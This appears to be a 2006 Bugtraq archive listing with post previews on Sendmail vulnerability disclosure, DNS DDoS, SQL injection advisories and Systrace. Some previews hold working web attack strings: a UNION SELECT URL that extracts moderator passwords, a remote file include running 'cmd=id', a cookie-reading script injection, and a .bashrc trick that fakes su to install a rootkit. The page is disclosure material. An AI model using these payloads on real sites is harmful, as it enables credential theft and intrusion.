HPSBUX02108 SSRT061133 rev.1 - HP-UX Sendmail, Remote Execution
2006-03-26 secure hpchs cup hp com (Security Alert)

SQL Injection in SaphpLesson2.0
2006-03-25 xx_hack_xx_2004 hotmail com
Hi Vulnerable: SaphpLesson2.0 http://www.Arabless.com Exploit : http://Example.com/lesson/print.php?lessid=[SQL] Example : For Name & Password http://Example.com/lesson/print.php?lessid=-1%20union%20select%20null,nu ll,null,ModName,null,ModPassword,null,ModPassword,null,ModPassword,null, null,null,n

UBBThreads<=5.5.1+6.0.2+6.0 br5+6.0.1 SQL injection
2006-03-25 dabdoub_mosikar forislam com
[+]UBBThreads [-]Founded By Moroccan Security Team [+]we are [DaBDouB-MoSiKaR,simo64,ki11er,Dr.E-Vil,|ucifier] [+]special 10x: to all friends SnIpEr_SA,Crash_OvEr_rIdE king-hacker,CiM-TeaM,ameer,Dranzelz,Esp!onLeRaVaGe and www.lezr.com [+]Solution:Upgrade to a version 6.0.3 [-]example:http://[targe

Re: recursive DNS servers DDoS as a growing DDoS problem
2006-03-25 Gadi Evron (ge linuxbox org)
MaddHatter wrote: >>We discussed recursive DNS servers before (servers which allow to query >>anything - including what they are not authoritative for, through them). >>... >>One of the problems is obviously the spoofing. ... > > > Maybe I'm misunderstanding the problem here (but I don't think so)

Re: recursive DNS servers DDoS as a growing DDoS problem
2006-03-25 MaddHatter maddhatt+bugtraq (at) cat.pdx (dot) edu (maddhatt+bugtraq cat pdx edu)
> We discussed recursive DNS servers before (servers which allow to query > anything - including what they are not authoritative for, through them). > ... > One of the problems is obviously the spoofing. ... Maybe I'm misunderstanding the problem here (but I don't think so). It seems to be the iss

Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)
2006-03-24 Eric Allman eric+bugtraq (at) neophilic (dot) com (eric+bugtraq neophilic com)
Theo, >> ISS explained it to us and >> told us that they had managed to craft an exploit in their lab, but >> frankly we don't see how it can be practical. > > I know the guy who exploited it. He's better than you think he is. I'm sorry, I was not trying to imply in any way that Mark was blowing

Re: Quick 'n Easy FTP Server 3.0 pro / lite (buffer overflow vulnerabilities)
2006-03-25 bifta04 aol com

Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)
2006-03-25 Casper Dik Sun COM
>So you are basically saying open source free software can't be trusted to >hold high standards or be reliable or secure if I don't pay for it? No, he is saying that *their* high standards are not necessarily *your* high standards. And that *they* get to define the rules with which they publish th

Re: [optimized PoC] Remote overflow in MSIE script action handlers (mshtml.dll)
2006-03-25 dgtlscrm gmail com

Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)
2006-03-25 Todd Burroughs (fd parsec net)
On Fri, 24 Mar 2006, Gadi Evron wrote: > On Thu, 23 Mar 2006, Claus Assmann wrote: >>> It took Sendmail a month to fix this. A month. >> >> No. It took sendmail a week to fix this. The rest of the time was >> used to coordinate the release with all the involved vendors etc. > > There are a few ch

[eVuln] DSDownload Multiple SQL Injection Vulnerabilities
2006-03-25 alex evuln com
New eVuln Advisory: DSDownload Multiple SQL Injection Vulnerabilities http://evuln.com/vulns/99/summary.html --------------------Summary---------------- eVuln ID: EV0099 CVE: CVE-2006-1232 Software: DSDownload Software's Web Site: http://dsportal.uw.hu/ Versions: 1.0 Critical Level: Moderate Type:

[eVuln] DSCounter 'X-Forwarded-For' SQL Injection Vulnerability
2006-03-25 alex evuln com
New eVuln Advisory: DSCounter 'X-Forwarded-For' SQL Injection Vulnerability http://evuln.com/vulns/98/summary.html --------------------Summary---------------- eVuln ID: EV0098 CVE: CVE-2006-1234 Software: DSCounter Software's Web Site: http://dsportal.uw.hu/ Versions: 1.2 Critical Level: Moderate T

Systrace 1.6: Phoenix Release
2006-03-25 Niels Provos (provos citi umich edu)
It's been a while since my last post to Bugtraq and it's been over three years since I first announced Systrace. Here is: Systrace 1.6: Phoenix Release --------------------------------------- You all know that Systrace ships by default with OpenBSD and NetBSD. However, Linux adoption has been hi

Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)
2006-03-25 Gadi Evron (ge linuxbox org)
Theo de Raadt wrote: >>Sendmail has been an important part of the Internet infrastructure and >>has gained a lot of honour and respect. Many people use this piece of >>software and a lot of distributors/vendors are proliferating this >>software. They do deserve better, as do the users who decide t

Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)
2006-03-25 D.F.Russell (DFRussell spamcop net)
Theo de Raadt wrote: >>Sendmail has been an important part of the Internet infrastructure and >>has gained a lot of honour and respect. Many people use this piece of >>software and a lot of distributors/vendors are proliferating this >>software. They do deserve better, as do the users who decide

RE: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)
2006-03-24 Michael A Fusaro II (maf mafii com)
Theo de Raadt wrote: > > You would probably expect me to be the last person to say > > that Sendmail is perfectly within their rights. I have > > had a lot of problems with what they are doing. > > > > But what did you pay for Sendmail? Was it a dollar, or was > > it more? Let me guess. It wa

Re: Sudo tricks
2006-03-24 Dave Korn (davek_throwaway hotmail com)
John Richard Moser wrote: > Here is a simple hack to break sudo and su to get free root. Add this > to ~/.bashrc and fill in the following blanks: > > * ~/.root_kit/rk_su > Your hacked su to give root on su --now-dammit > * ~/.root_kit/silent_install_root_kit > Your script to silently install rk_

Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)
2006-03-24 Gadi Evron (ge linuxbox org)
On Thu, 23 Mar 2006, Claus Assmann wrote: > Ask ISS about the exploit. It definitely is a programming bug, > just read the man page for setjmp() on an OpenBSD system. I did, ISS indeed enlightened me. Didn't I ask for just that? :) > > It took Sendmail a month to fix this. A month. > > No. It t

Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)
2006-03-24 Gadi Evron (ge linuxbox org)
On Thu, 23 Mar 2006, Theo de Raadt wrote: > > Sendmail is, as we know, the most used daemon for SMTP in the world. This > > is an International Infrastructure vulnerability and should have been > > treated that way. It wasn't. It was handled not only poorly, but > > irresponsibly. > > You would pro

Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)
2006-03-24 Theo de Raadt (deraadt cvs openbsd org)
> Sendmail has been an important part of the Internet infrastructure and > has gained a lot of honour and respect. Many people use this piece of > software and a lot of distributors/vendors are proliferating this > software. They do deserve better, as do the users who decide to trust > this vendor

Re: [Full-disclosure] SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)
2006-03-24 Gadi Evron (ge linuxbox org)
On Thu, 23 Mar 2006, Dragos Ruiu wrote: > On March 23, 2006 01:41 am, Gadi Evron wrote: > > Here's what ISS releasing the Race Condition vulnerability has to say: > > http://xforce.iss.net/xforce/alerts/id/216 > > They say it's a remote code execution. They say it's a race condition. No > > real dat

Re: Vulnerability Alert Services - Independent List
2006-03-24 Juha-Matti Laurio (juha-matti laurio netti fi)
Probably you were pointing to the following vendor: FrSIRT, not FrCIRT. Regards, Juha-Matti > Symantec Deepsight Alert Services > SecurityMob > FrCIRT > iAlert Web > TraceAlert > SecurityTracker > Cybertrust Vulnerability/Threat Management > Vulnerability Tracking Service > X-Force Threat Analysi

Re: [Full-disclosure] trusting SMTP [was: SendGate: Sendmail Multiple Vulnerabilities]
2006-03-24 Gadi Evron (ge linuxbox org)
On Fri, 24 Mar 2006 Valdis.Kletnieks (at) vt (dot) edu wrote: > On Thu, 23 Mar 2006 03:59:20 CST, Gadi Evron said: > > Oh, sorry for not mentioning earlier - > > Operators that want to patch Sendmail, I'd suggest doing it soon. Now we > > not only do we face risk to our mail servers, but rather trusting other

Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)
2006-03-24 Theo de Raadt (deraadt cvs openbsd org)
> Ask ISS about the exploit. It definitely is a programming bug, > just read the man page for setjmp() on an OpenBSD system. Claus is talking about this particular piece of text which we added to our setjmp(3) manual page in late 2001: CAVEATS [...] Use of longjmp() or siglongjmp() fro

Re: [ GLSA 200603-23 ] NetHack, Slash'EM, Falcon's Eye: Local privilege escalation
2006-03-24 Tavis Ormandy (taviso gentoo org)
On Fri, Mar 24, 2006 at 03:26:12AM -0800, neeko (at) feelingsinister (dot) net wrote: > Hello everyone. > > Doesn't the included text from the advisory really make it sound more like a > problem with their system for managing games? Hello, this is accurate. > It doesn't point out any flaw > in nethack in

Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)
2006-03-24 Gadi Evron (ge linuxbox org)
On Thu, 23 Mar 2006, Eric Allman wrote: <snip mostly relevant good replies by Mr. Allman> > Talk to the vendors. I've seen quite a few of their advisories come > by. After or before it hit the news? You may be able to alert vendors, but the problem with critical infrastructure is that is widely

Re: [ GLSA 200603-23 ] NetHack, Slash'EM, Falcon's Eye: Local privilege escalation
2006-03-24 Chris Gianelloni (wolf31o2 charter net)
On Fri, 2006-03-24 at 03:26 -0800, neeko (at) feelingsinister (dot) net wrote: > Doesn't the included text from the advisory really make it sound more like a > problem with their system for managing games? It doesn't point out any flaw > in nethack in general, just behavior that's unexpected/unwanted/uncont

VihorDesing Script Remote Command Execution And Cross Scripting Attack
2006-03-24 botan linuxmail org
Website : http://www.vihor.de I.Remote Execute : Vulnerable : http://www.site.com/[path]/index.php?page=evilcode.txt?&cmd=id II. Cross Attack http://www.site.com/[path]/index.php?page=<script>alert(document.cookie) </script> http://www.site.com/[path]/index.php?page=<script>alert(Patriotic Hac

Re: SendGate: Sendmail Multiple Vulnerabilities (Race Condition DoS, Memory Jumps, Integer Overflow)
2006-03-24 Martin Schulze (joey infodrom org)
Theo de Raadt wrote: > > Sendmail is, as we know, the most used daemon for SMTP in the world. This > > is an International Infrastructure vulnerability and should have been > > treated that way. It wasn't. It was handled not only poorly, but > > irresponsibly. The documentation is distressingly vag

HeffnerCMS Remote Command Execution And Cross Scripting Attack
2006-03-24 botan linuxmail org
Website : http://www.christian-heffner.de Version : 1.07 I. <?php $filename="index.php"; require_once 'vlib/vlibTemplate.php'; $tmpl = new vlibTemplate('tmpl/std/index.tpl'); require_once 'config/db_config.php'; require_once 'config/pcfunctions.php'; Ucuyor.... :) lol II. Vulnerabl
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
HPSBUX02108 SSRT061133 rev.1 - HP-UX running Sendmail, Remote Execution of Arbitrary Code
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2006-03-25
Last Updated: 2006-03-25
Potential Secu